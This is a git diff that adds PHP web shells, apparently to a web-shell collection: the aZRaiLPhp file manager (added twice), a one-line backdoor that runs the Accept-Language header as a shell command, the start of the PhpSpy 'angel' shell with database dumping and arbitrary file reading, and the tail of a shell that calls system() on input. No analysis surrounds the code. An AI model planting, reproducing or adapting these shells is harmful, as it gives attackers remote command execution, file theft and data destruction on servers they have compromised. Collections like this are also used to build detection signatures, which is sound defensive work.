+    system($currentCMD);
+    print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>Command completed</b></center>";
+}
+
+exit;
+
+?>
diff --git a/php/ZyklonShell.php b/php/ZyklonShell.php
new file mode 100644
index 0000000..23941c0
--- /dev/null
+++ b/php/ZyklonShell.php
@@ -0,0 +1,7 @@
+<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
+<HTML><HEAD>
+<TITLE>404 Not Found</TITLE>
+</HEAD><BODY>
+<H1>Not Found</H1>
+The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.<P>
+</BODY></HTML>
diff --git a/php/aZRaiLPhp v1.0.php b/php/aZRaiLPhp v1.0.php
new file mode 100644
index 0000000..17aed57
--- /dev/null
+++ b/php/aZRaiLPhp v1.0.php	
@@ -0,0 +1,284 @@
+<?php
+$default=$DOCUMENT_ROOT;
+$this_file="./azrailphp.php";
+
+if(isset($save)){
+$fname=str_replace(" ","_",$fname);
+$fname=str_replace("%20","_",$fname);
+header("Cache-control: private");
+header("Content-type: application/force-download");
+header("Content-Length: ".filesize($save));
+header("Content-Disposition: attachment; filename=$fname");
+
+$fp = fopen($save, 'r');
+fpassthru($fp);
+fclose($fp);
+unset($save);
+exit;
+}
+
+if ( function_exists('ini_get') ) {
+        $onoff = ini_get('register_globals');
+} else {
+        $onoff = get_cfg_var('register_globals');
+}
+if ($onoff != 1) {
+        @extract($_POST, EXTR_SKIP);
+        @extract($_GET, EXTR_SKIP);
+}
+
+
+function deltree($deldir) {
+        $mydir=@dir($deldir);
+        while($file=$mydir->read())        {
+                if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
+                        @chmod("$deldir/$file",0777);
+                        deltree("$deldir/$file");
+                }
+                if (is_file("$deldir/$file")) {
+                        @chmod("$deldir/$file",0777);
+                        @unlink("$deldir/$file");
+                }
+        }
+        $mydir->close();
+        @chmod("$deldir",0777);
+        echo @rmdir($deldir) ? "<center><b><font color='#0000FF'>SİLİNDİ:$deldir/$file</b></font></center>" : "<center><font color=\"#ff0000\">Silinemedi:$deldir/$file</font></center>";
+        }
+
+if ($op=='phpinfo'){
+$fonk_kap = get_cfg_var("fonksiyonları_kapat");
+        echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "<center>phpinfo() Komutu Çalışmıyiii</center>";
+        exit;
+}
+
+
+echo "<html>
+      <head>
+             <title>azrail 1.0 by C-W-M</title>
+      </head>
+
+       <body bgcolor='#000000' text='#008000' link='#00FF00' vlink='#00FF00' alink='#00FF00'>
+       </body>";
+
+echo "<center><font size='+3' color='#FF0000'><b> aZRaiLPhp v1.0!!!</b></font></center><br>
+      <center><font size='+2' color='#FFFFFF'>C-W-M</font><font size='+2' color='#FF0000'>HACKER</font><br>
+      <br>";
+echo "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP INFO</a></center>";
+echo "<br>
+      <br>";
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<div align=center>
+      <font size='+1' color='#0000FF'>Root Klasör: $DOCUMENT_ROOT</font><br>
+      <font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>";
+
+if(!isset($dir)){
+$dir="$default";
+}
+echo "<input type=text size=60 name=dir value='$dir'>
+<input type=submit value='GIT'><br>
+</form>
+</div>";
+
+if ($op=='up'){
+        $path=dir;
+        echo "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA GONDERME</b></font></center><br>";
+if(isset($dosya_gonder)) {
+
+if (copy ( $dosya_gonder, "$dir/$dosya_gonder_name" )){
+    echo "<center><font color='#0000FF'>Dosya Başarıyla Gönderildi</font></center>";
+}
+} elseif(empty($dosya_gonder)) {
+$path=$dir;
+$dir = $dosya_dizin;
+echo "$dir";
+echo "<FORM  ENCTYPE='multipart/form-data' ACTION='$this_file?op=up&dir=$path' METHOD='POST'>";
+echo "<center><INPUT TYPE='file' NAME='dosya_gonder'></center><br>";
+
+echo "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>";
+echo "</form>";
+
+
+echo "</html>";
+} else {
+die ("<center><font color='#FF0000'>Dosya kopyalanamıyor!</font><center>");
+}
+}
+
+if($op=='mf'){
+    $path=$dir;
+    if(isset($dismi) && isset($kodlar)){
+                $ydosya="$path/$dismi";
+                if(file_exists("$path/$dismi")){
+                        $dos= "Böyle Bir Dosya Vardı Üzerine Yazıldı";
+                } else {
+                        $dos = "Dosya Oluşturuldu";
+                }
+                touch ("$path/$dismi") or die("Dosya Oluşturulamıyor");
+                $ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak için açılamıyor");
+                fwrite($ydosya2, $kodlar) or die("Dosyaya yazılamıyor");
+                fclose($ydosya2);
+                echo "<center><font color='#0000FF'>$dos</font></center>";
+        } else {
+
+        echo "<FORM METHOD='POST' ACTION='$this_file?op=mf&dir=$path'>";
+        echo "<center>Dosya İsmi :<input type='text' name='dismi'></center><br>";
+    echo "<br>";
+    echo "<center>KODLAR</center><br>";
+    echo "<center><TEXTAREA NAME='kodlar' ROWS='19' COLS='52'></TEXTAREA></center>";
+        echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
+    echo "</form>";
+        }
+}
+
+if($op=='md'){
+        $path=$dir;
+        if(isset($kismi) && isset($okmf)){
+                $klasör="$path/$kismi";
+                mkdir("$klasör", 0777) or die ("<center><font color='#0000FF'>Klasör Oluşturulamıyor</font></center>");
+                echo "<center><font color='#0000FF'>Klasör Oluşturuldu</font></center>";
+        }
+
+        echo "<FORM METHOD='POST' ACTION='$this_file?op=md&dir=$path'>";
+        echo "<center>Klasör İsmi :<input type='text' name='kismi'></center><br>";
+        echo "<br>";
+        echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
+        echo "</form>";
+}
+
+
+if($op=='del'){
+unlink("$fname");
+}
+
+
+if($op=='dd'){
+        $dir=$here;
+                $deldirs=$yol;
+                if(!file_exists("$deldirs")) {
+                        echo "<font color=\"#ff0000\">Dosya Yok</font>";
+                } else {
+                        deltree($deldirs);
+                }
+}
+
+
+
+if($op=='edit'){
+$yol=$fname;
+$yold=$path;
+if (isset($ok)){
+$dosya = fopen("$yol", 'w') or die("Dosya Açılamıyor");
+$metin=$tarea;
+fwrite($dosya, $metin) or die("Yazılamıyor!");
+fclose($dosya);
+echo "<center><font color='#0000FF'Dosya Başarıyla Düzenlendi</font></center>";
+} else {
+$path=$dir;
+echo "<center>DÜZENLE: $yol</center>";
+$dosya = fopen("$yol", 'r') or die("<center><font color='#FF0000'Dosya Açılamıyor</font></center>");
+$boyut=filesize($yol);
+$duzen = @fread ($dosya, $boyut);
+echo "<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>";
+echo "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>";
+echo "<center><input type='Submit' value='TAMAM' name='ok'></center>";
+fclose($dosya);
+$duzen=htmlspecialchars($duzen);
+echo "</form>";
+}
+}
+
+if($op=='efp2'){
+$fileperm=base_convert($_POST['fileperm'],8,10);
+        echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "<font color='#0000FF'><b>$dismi2 İSİMLİ DOSYANIN</font></b>" : "<font color=\"#ff0000\">DEİŞTİRİLEMEDİ!!</font>";
+        echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEİŞTİRİLDİ</font>";
+}
+
+if($op=='efp'){
+$izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
+echo "<form method=post action=./$this_file?op=efp2>
+      <div align=center><input name='dismi2' type='text' value='$dismi' class='input' readonly>CHMOD:
+      <input type='text' name='fileperm' size='20' value='$izinler2' class='input'>
+      <input name='dir' type='hidden' value='$yol'>
+      <input type='submit' value='TAMAM' class='input'></div><br>
+      </form>";
+
+}
+
+
+$path=$dir;
+if(isset($dir)){
+if ($dir = @opendir("$dir")) {
+while (($file = readdir($dir)) !== false) {
+if($file!="." && $file!=".."){
+if(is_file("$path/$file")){
+$disk_space=filesize("$path/$file");
+$kb=$disk_space/1024;
+$total_kb = number_format($kb, 2, '.', '');
+$total_kb2="Kb";
+
+
+echo "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> $file</b></font> - <a href='./$this_file?save=$path/$file&fname=$file'>indir</a> - <a href='./$this_file?op=edit&fname=$path/$file&dir=$path'>düzenle</a> - ";
+echo "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> - <b>$total_kb$total_kb2</b> - ";
+@$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
+echo "<br></div>\n";
+}else{
+echo "<div align=left><a href='./$this_file?dir=$path/$file'>GİT></a> <font face='arial' size='3' color='#808080'> $path/$file</font> - <b>DIR</b> - <a href='./$this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> - ";
+$dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "<font color='#FFFF00'>$dirperm</font>";
+echo " <br></div>\n";
+
+}
+}
+}
+closedir($dir);
+}
+}
+
+
+
+
+
+echo "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root Klasörüne Git</a></center>";
+if(file_exists("B:\\")){
+echo "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
+} else {}
+if(file_exists("C:\\")){
+echo "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
+} else {}
+if (file_exists("D:\\")){
+ echo "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
+} else {}
+if (file_exists("E:\\")){
+ echo "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
+} else {}
+if (file_exists("F:\\")){
+ echo "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
+} else {}
+if (file_exists("G:\\")){
+ echo "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
+} else {}
+if (file_exists("H:\\")){
+ echo "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
+} else {}
+
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center><font size='+1' color='#FF0000'><b>SERVER BİLGİLERİ</b></font><br></center>";
+echo "<br><u><b>$SERVER_SIGNATURE</b></u>";
+echo "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
+echo "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
+echo "<br>";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center><font size='+1' color='#FF0000'><b>İŞLEMLER</b></font><br></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=up&dir=$path'>Dosya Gönder</a></font></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=mf&dir=$path'>Dosya Oluştur</a></font></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=md&dir=$path'>Klasör Oluştur</a></font></center>";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center>Tüm hakları sahibi 	C-W-M'ye aittir</center><br>";
+?>
+
+
+
+
diff --git a/php/aZRaiLPhp_v1.0.php b/php/aZRaiLPhp_v1.0.php
new file mode 100644
index 0000000..17aed57
--- /dev/null
+++ b/php/aZRaiLPhp_v1.0.php
@@ -0,0 +1,284 @@
+<?php
+$default=$DOCUMENT_ROOT;
+$this_file="./azrailphp.php";
+
+if(isset($save)){
+$fname=str_replace(" ","_",$fname);
+$fname=str_replace("%20","_",$fname);
+header("Cache-control: private");
+header("Content-type: application/force-download");
+header("Content-Length: ".filesize($save));
+header("Content-Disposition: attachment; filename=$fname");
+
+$fp = fopen($save, 'r');
+fpassthru($fp);
+fclose($fp);
+unset($save);
+exit;
+}
+
+if ( function_exists('ini_get') ) {
+        $onoff = ini_get('register_globals');
+} else {
+        $onoff = get_cfg_var('register_globals');
+}
+if ($onoff != 1) {
+        @extract($_POST, EXTR_SKIP);
+        @extract($_GET, EXTR_SKIP);
+}
+
+
+function deltree($deldir) {
+        $mydir=@dir($deldir);
+        while($file=$mydir->read())        {
+                if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
+                        @chmod("$deldir/$file",0777);
+                        deltree("$deldir/$file");
+                }
+                if (is_file("$deldir/$file")) {
+                        @chmod("$deldir/$file",0777);
+                        @unlink("$deldir/$file");
+                }
+        }
+        $mydir->close();
+        @chmod("$deldir",0777);
+        echo @rmdir($deldir) ? "<center><b><font color='#0000FF'>SİLİNDİ:$deldir/$file</b></font></center>" : "<center><font color=\"#ff0000\">Silinemedi:$deldir/$file</font></center>";
+        }
+
+if ($op=='phpinfo'){
+$fonk_kap = get_cfg_var("fonksiyonları_kapat");
+        echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "<center>phpinfo() Komutu Çalışmıyiii</center>";
+        exit;
+}
+
+
+echo "<html>
+      <head>
+             <title>azrail 1.0 by C-W-M</title>
+      </head>
+
+       <body bgcolor='#000000' text='#008000' link='#00FF00' vlink='#00FF00' alink='#00FF00'>
+       </body>";
+
+echo "<center><font size='+3' color='#FF0000'><b> aZRaiLPhp v1.0!!!</b></font></center><br>
+      <center><font size='+2' color='#FFFFFF'>C-W-M</font><font size='+2' color='#FF0000'>HACKER</font><br>
+      <br>";
+echo "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP INFO</a></center>";
+echo "<br>
+      <br>";
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<div align=center>
+      <font size='+1' color='#0000FF'>Root Klasör: $DOCUMENT_ROOT</font><br>
+      <font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>";
+
+if(!isset($dir)){
+$dir="$default";
+}
+echo "<input type=text size=60 name=dir value='$dir'>
+<input type=submit value='GIT'><br>
+</form>
+</div>";
+
+if ($op=='up'){
+        $path=dir;
+        echo "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA GONDERME</b></font></center><br>";
+if(isset($dosya_gonder)) {
+
+if (copy ( $dosya_gonder, "$dir/$dosya_gonder_name" )){
+    echo "<center><font color='#0000FF'>Dosya Başarıyla Gönderildi</font></center>";
+}
+} elseif(empty($dosya_gonder)) {
+$path=$dir;
+$dir = $dosya_dizin;
+echo "$dir";
+echo "<FORM  ENCTYPE='multipart/form-data' ACTION='$this_file?op=up&dir=$path' METHOD='POST'>";
+echo "<center><INPUT TYPE='file' NAME='dosya_gonder'></center><br>";
+
+echo "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>";
+echo "</form>";
+
+
+echo "</html>";
+} else {
+die ("<center><font color='#FF0000'>Dosya kopyalanamıyor!</font><center>");
+}
+}
+
+if($op=='mf'){
+    $path=$dir;
+    if(isset($dismi) && isset($kodlar)){
+                $ydosya="$path/$dismi";
+                if(file_exists("$path/$dismi")){
+                        $dos= "Böyle Bir Dosya Vardı Üzerine Yazıldı";
+                } else {
+                        $dos = "Dosya Oluşturuldu";
+                }
+                touch ("$path/$dismi") or die("Dosya Oluşturulamıyor");
+                $ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak için açılamıyor");
+                fwrite($ydosya2, $kodlar) or die("Dosyaya yazılamıyor");
+                fclose($ydosya2);
+                echo "<center><font color='#0000FF'>$dos</font></center>";
+        } else {
+
+        echo "<FORM METHOD='POST' ACTION='$this_file?op=mf&dir=$path'>";
+        echo "<center>Dosya İsmi :<input type='text' name='dismi'></center><br>";
+    echo "<br>";
+    echo "<center>KODLAR</center><br>";
+    echo "<center><TEXTAREA NAME='kodlar' ROWS='19' COLS='52'></TEXTAREA></center>";
+        echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
+    echo "</form>";
+        }
+}
+
+if($op=='md'){
+        $path=$dir;
+        if(isset($kismi) && isset($okmf)){
+                $klasör="$path/$kismi";
+                mkdir("$klasör", 0777) or die ("<center><font color='#0000FF'>Klasör Oluşturulamıyor</font></center>");
+                echo "<center><font color='#0000FF'>Klasör Oluşturuldu</font></center>";
+        }
+
+        echo "<FORM METHOD='POST' ACTION='$this_file?op=md&dir=$path'>";
+        echo "<center>Klasör İsmi :<input type='text' name='kismi'></center><br>";
+        echo "<br>";
+        echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
+        echo "</form>";
+}
+
+
+if($op=='del'){
+unlink("$fname");
+}
+
+
+if($op=='dd'){
+        $dir=$here;
+                $deldirs=$yol;
+                if(!file_exists("$deldirs")) {
+                        echo "<font color=\"#ff0000\">Dosya Yok</font>";
+                } else {
+                        deltree($deldirs);
+                }
+}
+
+
+
+if($op=='edit'){
+$yol=$fname;
+$yold=$path;
+if (isset($ok)){
+$dosya = fopen("$yol", 'w') or die("Dosya Açılamıyor");
+$metin=$tarea;
+fwrite($dosya, $metin) or die("Yazılamıyor!");
+fclose($dosya);
+echo "<center><font color='#0000FF'Dosya Başarıyla Düzenlendi</font></center>";
+} else {
+$path=$dir;
+echo "<center>DÜZENLE: $yol</center>";
+$dosya = fopen("$yol", 'r') or die("<center><font color='#FF0000'Dosya Açılamıyor</font></center>");
+$boyut=filesize($yol);
+$duzen = @fread ($dosya, $boyut);
+echo "<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>";
+echo "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>";
+echo "<center><input type='Submit' value='TAMAM' name='ok'></center>";
+fclose($dosya);
+$duzen=htmlspecialchars($duzen);
+echo "</form>";
+}
+}
+
+if($op=='efp2'){
+$fileperm=base_convert($_POST['fileperm'],8,10);
+        echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "<font color='#0000FF'><b>$dismi2 İSİMLİ DOSYANIN</font></b>" : "<font color=\"#ff0000\">DEİŞTİRİLEMEDİ!!</font>";
+        echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEİŞTİRİLDİ</font>";
+}
+
+if($op=='efp'){
+$izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
+echo "<form method=post action=./$this_file?op=efp2>
+      <div align=center><input name='dismi2' type='text' value='$dismi' class='input' readonly>CHMOD:
+      <input type='text' name='fileperm' size='20' value='$izinler2' class='input'>
+      <input name='dir' type='hidden' value='$yol'>
+      <input type='submit' value='TAMAM' class='input'></div><br>
+      </form>";
+
+}
+
+
+$path=$dir;
+if(isset($dir)){
+if ($dir = @opendir("$dir")) {
+while (($file = readdir($dir)) !== false) {
+if($file!="." && $file!=".."){
+if(is_file("$path/$file")){
+$disk_space=filesize("$path/$file");
+$kb=$disk_space/1024;
+$total_kb = number_format($kb, 2, '.', '');
+$total_kb2="Kb";
+
+
+echo "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> $file</b></font> - <a href='./$this_file?save=$path/$file&fname=$file'>indir</a> - <a href='./$this_file?op=edit&fname=$path/$file&dir=$path'>düzenle</a> - ";
+echo "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> - <b>$total_kb$total_kb2</b> - ";
+@$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
+echo "<br></div>\n";
+}else{
+echo "<div align=left><a href='./$this_file?dir=$path/$file'>GİT></a> <font face='arial' size='3' color='#808080'> $path/$file</font> - <b>DIR</b> - <a href='./$this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> - ";
+$dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "<font color='#FFFF00'>$dirperm</font>";
+echo " <br></div>\n";
+
+}
+}
+}
+closedir($dir);
+}
+}
+
+
+
+
+
+echo "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root Klasörüne Git</a></center>";
+if(file_exists("B:\\")){
+echo "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
+} else {}
+if(file_exists("C:\\")){
+echo "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
+} else {}
+if (file_exists("D:\\")){
+ echo "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
+} else {}
+if (file_exists("E:\\")){
+ echo "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
+} else {}
+if (file_exists("F:\\")){
+ echo "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
+} else {}
+if (file_exists("G:\\")){
+ echo "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
+} else {}
+if (file_exists("H:\\")){
+ echo "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
+} else {}
+
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center><font size='+1' color='#FF0000'><b>SERVER BİLGİLERİ</b></font><br></center>";
+echo "<br><u><b>$SERVER_SIGNATURE</b></u>";
+echo "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
+echo "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
+echo "<br>";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center><font size='+1' color='#FF0000'><b>İŞLEMLER</b></font><br></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=up&dir=$path'>Dosya Gönder</a></font></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=mf&dir=$path'>Dosya Oluştur</a></font></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=md&dir=$path'>Klasör Oluştur</a></font></center>";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center>Tüm hakları sahibi 	C-W-M'ye aittir</center><br>";
+?>
+
+
+
+
diff --git a/php/accept_language.php b/php/accept_language.php
new file mode 100644
index 0000000..b3c8e0a
--- /dev/null
+++ b/php/accept_language.php
@@ -0,0 +1 @@
+<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); echo '<br> by q1w2e3r4'; ?>
diff --git a/php/angel.php b/php/angel.php
new file mode 100644
index 0000000..ffee9a3
--- /dev/null
+++ b/php/angel.php
@@ -0,0 +1,1962 @@
+<?php
+error_reporting(7);
+@set_magic_quotes_runtime(0);
+ob_start();
+$mtime = explode(' ', microtime());
+$starttime = $mtime[1] + $mtime[0];
+define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
+//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
+define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
+define('IS_COM', class_exists('COM') ? 1 : 0 );
+define('IS_GPC', get_magic_quotes_gpc());
+$dis_func = get_cfg_var('disable_functions');
+define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
+@set_time_limit(0);
+
+foreach(array('_GET','_POST') as $_request) {
+	foreach($$_request as $_key => $_value) {
+		if ($_key{0} != '_') {
+			if (IS_GPC) {
+				$_value = s_array($_value);
+			}
+			$$_key = $_value;
+		}
+	}
+}
+
+/*===================== ||-&#1028;+&#1092;+| =====================*/
+$admin = array();
+// -|+&#1105;-&#1096;-&#1082;|#-&#1099;-&#1097;+&#1076;, true +&#1082;-&#1096;-&#1082;-&#1097;+&#1076;, false +&#1082;+#+++ +&#1099;.--|&#1094;-&#1073;-&#1102;+&#1028;+|-&#1079;
+$admin['check'] = 0;
+// +&#1095;| -&#1096;-&#1082;|#-&#1099;-&#1097;+&#1076;,|&#1099;-|+-||-+|#-&#1099;
+$admin['pass']  = 'angel';
+
+//+&#1095;- |+ cookie +&#1118;+|+|+&#1079;+-|+-&#1090;-&#1082;|&#1108;, +&#1028;||-+#++ |&#1075;, |&#1099;-|+---|&#1094;#&#1092;-+, +&#1105;+&#1028;|&#1099;#&#1075;|+-&#1084;+-
+// cookie |#+|
+$admin['cookiepre'] = '';
+// cookie +&#1118;+|+&#1028;
+$admin['cookiedomain'] = '';
+// cookie +&#1118;+|-++|
+$admin['cookiepath'] = '/';
+// cookie +--&#1079;|+
+$admin['cookielife'] = 86400;
+/*===================== +&#1092;+|+&#1089;-  =====================*/
+
+if ($charset == 'utf8') {
+	header("content-Type: text/html; charset=utf-8");
+} elseif ($charset == 'big5') {
+	header("content-Type: text/html; charset=big5");
+} elseif ($charset == 'gbk') {
+	header("content-Type: text/html; charset=gbk");
+} elseif ($charset == 'latin1') {
+	header("content-Type: text/html; charset=iso-8859-2");
+}
+
+$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
+$timestamp = time();
+
+/*===================== +&#1101;+|-&#1097;+&#1076; =====================*/
+if ($action == "logout") {
+	scookie('phpspypass', '', -86400 * 365);
+	p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
+	p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
+	exit;
+}
+if($admin['check']) {
+	if ($doing == 'login') {
+		if ($admin['pass'] == $password) {
+			scookie('phpspypass', $password);
+			p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
+			p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
+			exit;
+		}
+	}
+	if ($_COOKIE['phpspypass']) {
+		if ($_COOKIE['phpspypass'] != $admin['pass']) {
+			loginpage();
+		}
+	} else {
+		loginpage();
+	}
+}
+/*===================== -&#1097;+&#1076;+&#1089;-  =====================*/
+
+$errmsg = '';
+
+// #&#1097;+|PHPINFO
+if ($action == 'phpinfo') {
+	if (IS_PHPINFO) {
+		phpinfo();
+	} else {
+		$errmsg = 'phpinfo() function has non-permissible';
+	}
+}
+
+// --+++-+ 
+if ($doing == 'downfile' && $thefile) {
+	if (!@file_exists($thefile)) {
+		$errmsg = 'The file you want Downloadable was nonexistent';
+	} else {
+		$fileinfo = pathinfo($thefile);
+		header('Content-type: application/x-'.$fileinfo['extension']);
+		header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+		header('Content-Length: '.filesize($thefile));
+		@readfile($thefile);
+		exit;
+	}
+}
+
+// +#++--++#++|- +|+&#1090;
+if ($doing == 'backupmysql' && !$saveasfile) {
+	dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+	$table = array_flip($table);
+	$result = q("SHOW tables");
+	if (!$result) p('<h2>'.mysql_error().'</h2>');
+	$filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
+	header('Content-type: application/unknown');
+	header('Content-Disposition: attachment; filename='.$filename);
+	$mysqldata = '';
+	while ($currow = mysql_fetch_array($result)) {
+		if (isset($table[$currow[0]])) {
+			$mysqldata .= sqldumptable($currow[0]);
+		}
+	}
+	mysql_close();
+	exit;
+}
+
+// -&#1080;| MYSQL--+++-+ 
+if($doing=='mysqldown'){
+	if (!$dbname) {
+		$errmsg = 'Please input dbname';
+	} else {
+		dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+		if (!file_exists($mysqldlfile)) {
+			$errmsg = 'The file you want Downloadable was nonexistent';
+		} else {
+			$result = q("select load_file('$mysqldlfile');");
+			if(!$result){
+				q("DROP TABLE IF EXISTS tmp_angel;");
+				q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
+				//+|-#+&#1092;|-+|#&#1101;-+++|-,##|&#1090;|&#1038;-+|-+&#1073;+++&#1101;+&#1028;# |&#1084;__angel_1111111111_eof__|-+-+ -##+-&#1098;+ |-|&#1097;+&#1038;
+				q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
+				$result = q("select content from tmp_angel");
+				q("DROP TABLE tmp_angel");
+			}
+			$row = @mysql_fetch_array($result);
+			if (!$row) {
+				$errmsg = 'Load file failed '.mysql_error();
+			} else {
+				$fileinfo = pathinfo($mysqldlfile);
+				header('Content-type: application/x-'.$fileinfo['extension']);
+				header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+				header("Accept-Length: ".strlen($row[0]));
+				echo $row[0];
+				exit;
+			}
+		}
+	}
+}
+
+?>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gbk">
+<title><?php echo str_replace('.','','P.h.p.S.p.y');?></title>
+<style type="text/css">
+body,td{font: 12px Arial,Tahoma;line-height: 16px;}
+.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
+.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
+.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
+a {color: #00f;text-decoration:underline;}
+a:hover{color: #f00;text-decoration:none;}
+.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}
+.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}
+.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
+.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}
+.head td span{font-weight:normal;}
+form{margin:0;padding:0;}
+h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
+ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
+u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
+</style>
